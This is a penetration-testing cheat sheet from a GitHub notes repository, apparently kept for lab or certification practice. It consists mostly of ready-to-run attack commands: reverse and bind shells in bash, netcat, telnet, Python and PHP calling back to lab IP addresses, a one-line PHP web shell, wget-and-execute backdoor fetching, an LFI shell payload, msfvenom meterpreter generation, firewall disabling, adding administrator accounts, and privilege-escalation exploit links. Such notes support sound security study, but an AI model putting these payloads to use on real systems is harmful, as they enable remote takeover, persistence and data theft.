wwkenwong/Pentest-note
Pentest-note

Contents

Shell

Reverse Shell

Windows:

nc IP PORT -e cmd.exe

Listener:

nc -nlvp PORT

Linux:

bash -i >& /dev/tcp/10.11.0.0/31337 0>&1
nc -e /bin/sh 10.11.0.0 31337

Telnet reverse shell:

telnet 10.11.0.xxx 31337 | /bin/bash | telnet 10.11.0.xxx 31338
rm -f /tmp/p; mknod /tmp/p p && telnet 10.11.0.xxx 31337 0/tmp/p

Python reverse shell:

-c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.x.xxx",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP reverse shell:

<?php echo shell_exec ('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attacking IP port >/tmp/f');?>

Usage:

<?php echo shell_exec ('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.0.xx 80 >/tmp/f');?>
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
wget -O /tmp/bd.php <url_to_malicious_file> && php -f /tmp/bd.php

Reverse PHP shell:

Port 80 may be a good choice for the listener.

https://github.com/fuzzdb-project/fuzzdb/blob/master/web-backdoors/wordpress/templates/php-reverse-shell.php

Deployment:

Host the shell with a .txt extension so that it is not executed on the serving host (and is less likely to be flagged by an IDS); fetch it onto the target with:

<?system('wget http://10.11.0.xxx/php-reverse-shell.php.txt -O /tmp/2.php');?>

Kadimus

This tool exploits LFI.

Shell:

./kadimus -t 'https://10.11.1.xx/section.php?page=php://input%00' -C '<?php echo shell_exec("bash -i >& /dev/tcp/10.11.0.xxx/4444 0>&1 2>&1"); ?>' -X input

More:

http://pentestmonkey.net/tools/web-shells/php-reverse-shell

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

https://gist.github.com/sckalath/67a59eb4955f1f9aedde

https://gist.github.com/sckalath/89590ef81557f3a87ef0

Bind Shell

nc IP PORT

nc -nlvp PORT -e cmd.exe
python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i

In some cases sh works better than bash.

Web Shell

One-line PHP web shell (works on Windows and Linux):

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

Usage:
http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

File transfer

FTP

Build a script on the Windows host and feed it to the ftp client. Note the space before > in the first line: in cmd.exe a digit written directly before > is parsed as a file handle, so "21> ftp.txt" would write "open 10.11.0.xxx 2" to the file.

echo open 10.11.0.xxx 21 > ftp.txt
echo USER offsec>> ftp.txt
echo ftp>> ftp.txt
echo bin >> ftp.txt
echo GET nc.exe >> ftp.txt
echo bye >> ftp.txt
ftp -v -n -s:ftp.txt

TFTP

mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /usr/share/windows-binaries/nc.exe /tftp/
tftp -i 10.xx.0.x get nc.exe

nc

Sender: nc -nlvp PORT -w <seconds to wait before closing after the transfer> < file
Receiver: nc IP PORT > file

SMB

Server (from /usr/share/doc/python-impacket/examples): python smbserver.py PPP /root/Desktop/xxxxx/working/xxxx/MS17-010/

Receiver (on the Windows host): copy \\10.11.0.xxx\PPP\1.exe C:\

curl

If PUT is enabled on the server:

curl -v -X PUT -T 2.txt 10.11.1.xxx/2.txt

Other tools

cadaver http://10.11.1.xxx
dav:/> put shell.asp shell.txt
dav:/> copy shell.txt shell.asp;.txt

http

Hosting files with Python's built-in web server (PHP files are served as plain text rather than executed on the hosting side):

python -m SimpleHTTPServer 80

Scanner

nmap

Nmap scripts live in /usr/share/nmap/scripts

Full scan:

nmap -p 1-65535 -T4 -A -v 10.11.1.xxx

Scan with all NSE scripts:

nmap -v -p <port> --script all <target>

Host discovery (ping sweep, no port scan):

nmap -sn 192.168.1.10/24

HTTP methods check:

nmap --script http-methods <target>

Scan with version detection and the default scripts:

nmap -sV -sC 10.11.1.xxx

Scan a UDP port:

nmap -sU -p <port> <ip>

MS SQL xp_cmdshell:

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=poiuytrewq,ms-sql-xp-cmdshell.cmd="net user test test /add" 10.11.1.xxx

nikto

Commands:

nikto -h <ip>

HTTPS / other ports:

nikto -h <ip>:443 (or :8080, :8000)

More usage: https://cirt.net/nikto2-docs/usage.html

enum4linux

Command:

enum4linux <ip>

LFISuite

https://github.com/D35m0nd142/LFISuite

gobuster

Command:

gobuster -e -u http://192.168.0.155/ -w /usr/share/wordlists/dirb/big.txt

Enable commands

Windows commands

Enable RDP service:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Disable RDP service:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f

File transfer over RDP (share a local directory into the session):

rdesktop ip -r disk:share=/home/xxx/yyy

Firewall:

Non-XP (netsh advfirewall):

To turn off:

netsh advfirewall set allprofiles state off

To turn on:

netsh advfirewall set allprofiles state on

Status check:

netsh advfirewall show allprofiles

Windows XP firewall:

Disable the Windows XP firewall:

netsh firewall set opmode disable

Enable the Windows XP firewall:

netsh firewall set opmode enable

Add new user on Windows:

net user test test /add
net localgroup "Administrators" test /add

Linux commands

Compile exploits

Compile for Windows

Ubuntu (64-bit):
sudo apt-get update
sudo apt-get install mingw-w64

Usage: i686-w64-mingw32-gcc MS11-046.c -o MS11-046.exe -lws2_32 for 32-bit; remove -lws2_32 for 64-bit

Compile for Linux

Ubuntu:
sudo apt-get install libc6-dev-i386

CentOS:
yum install glibc-devel
yum install glibc-devel.i686
yum install glibc-devel.i686 libgcc.i686 libstdc++-devel.i686 ncurses-devel.i686
yum install glibc-static

Usage:
gcc -m32 -o exp exp.c -static
gcc -m64 -o exp exp.c -static

Docker environment:

https://hub.docker.com/_/centos/

Generate payload

msfvenom

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.11.0.xxx LPORT=31337 -f raw > shell.php

MSF Handler

Command:

use exploit/multi/handler
set payload linux/x86/shell_reverse_tcp
set lhost 10.11.0.xxx
set lport 31337
set ExitOnSession True
exploit

Common exploits

Mempodipper:

Linux Kernel 2.6.39 < 3.2.2
https://www.exploit-db.com/exploits/18411/

Powershell-suite

https://github.com/FuzzySecurity/PowerShell-Suite

MS08-067 SMB bug

https://gist.github.com/AfroThundr3007730/b433f420a792237440c836c06b4b32ab

UDEV < 1.4.1 - Local Privilege Escalation

https://www.exploit-db.com/exploits/8478/

Usage: http://www.madirish.net/370

CSRSS Privilege Escalation (MS05-018) Windows XP SP1

https://www.exploit-db.com/exploits/1198/
https://www.cnblogs.com/xiaoxiaoleo/p/8452004.html

CVE-2010-3904

Kernel 2.6.30-36
https://github.com/lucyoa/kernel-exploits/tree/master/rds

MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2)

https://www.exploit-db.com/exploits/1518/
https://dillidba.blogspot.com/2016/01/get-root-shell-access-using-mysql-with.html

Command snippets

Cat on Windows:

C:\>type c.txt

Search file on Windows:

dir /b/s *.txt

Bash for loop:

for i in {1..254}; do nmap --script smb-vuln-ms08-067.nse 10.11.1.$i; done

Check permissions of .exe files on Windows:

icacls *.exe

SNMP (UDP service):

Examples:

https://github.com/joenorton8014/offense/wiki/SNMP-on-Windows

netstat:

netstat -an

Check which ports are reachable from the victim:

nc -nvv -w 1 -z <your IP> 1-100

Linux PE: https://gist.github.com/sckalath/8b8fe29ee5489eaefda1

https://security.stackexchange.com/questions/151700/privilege-escalation-using-passwd-file

Enum cheat sheet

https://www.rebootuser.com/?p=1623

Windows PE

https://ibarramario94.gitbooks.io/oscp/content/oscp/windows-post.html

https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
